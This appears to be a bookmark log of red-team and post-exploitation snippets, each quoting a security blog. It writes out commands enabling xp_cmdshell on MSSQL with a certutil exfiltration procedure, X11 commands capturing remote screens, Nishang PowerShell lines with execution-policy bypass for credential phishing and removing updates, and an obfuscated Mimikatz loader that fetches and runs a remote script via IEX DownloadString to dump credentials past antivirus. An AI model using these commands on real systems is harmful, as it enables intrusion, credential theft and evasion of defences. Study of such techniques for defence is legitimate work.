-
Red Team Tales 0x01: From MSSQL to RCE - Tarlogic Security - Cyber Security and Ethical hacking
March 28, 2019 at 12:15:52 AM UTC - permalink -EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;The procedure to achieve it is as follows:
Declare a variable of “table” type to save the output that returns the xp_cmdshell procedure (remember that it returns the result in several rows). Dump the output of the command to the previous variable. Concatenate the rows of the table, separated by a line break. Encode the resulting string in Base64 and save it in a variable. Generate the certutil command, appending the string with the result. Execute it.- https://www.tarlogic.com/en/blog/red-team-tales-0x01/
-
-
Release the Kraken: Starting Your Password Cracking Journey
March 20, 2019 at 1:30:09 AM UTC - permalink -Wordlists
-Weakpass 2.0: https://weakpass.com/download
- Crackstation: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm
- Rockyou: included in Kali Linux - https://www.kali.org/downloads/
Rules
- Append_d: adds numbers to the end of a password, i.e. Password -> Password77
- Append_s: adds special characters to the end of a password, i.e. Password -> Password!
- Leetspeak: changes passwords to leetspeak, i.e. password -> p4$$w0rd
- https://threat.tevora.com/release-the-kraken/
-
-
-
-
-
-
-
-
X11 Hacking · Zach Grace
February 26, 2019 at 8:03:36 AM UTC - permalink -apt-get install x11-utils xutils-dev imagemagick libxext-dev xspy xwininfo -root -tree -display 172.16.31.102:0 xwd -root -screen -silent -display 10.10.10.10:0 > screenshot.xwd convert screenshot.xwd screenshot.pngWatching the display
./xwatchwin -u 0.5 172.16.31.102:0 root- https://zachgrace.com/training/x11/
-
-
-
Nishang: A Post-Exploitation Framework
February 20, 2019 at 11:00:59 PM UTC - permalink -Port-Scan
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”Remove-Update
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”Invoke-CredentialsPhish
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”- https://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/
-
Pwning the Enterprise With PowerShell
February 20, 2019 at 10:17:58 PM UTC - permalink -PowerMeta - Discover publicly available files, extract metadata, provide information about internal username schema, system names, domain info ... https://github.com/dathack/PowerMeta
MailSniper, powercat, empire, unicorn, dnscat2-powershell, invoke-powershellicmp, ...- https://fr.slideshare.net/dafthack/pwning-the-enterprise-with-powershell
-
-
geoda: Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls
February 20, 2019 at 2:24:52 PM UTC - permalink -https://github.com/danielbohannon/Invoke-Obfuscation
PS > Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation Invoke-Obfuscation > set SCRIPTBLOCK "iEX (New-Object System.Net.WebClient).DownloadString('https://<IP>:<PORT>/obfuscated.ps1'); Invoke-Mimidogz -DumpCred ...- https://blog.geoda-security.com/2018/05/running-obfuscated-version-of-mimikatz.html
-
-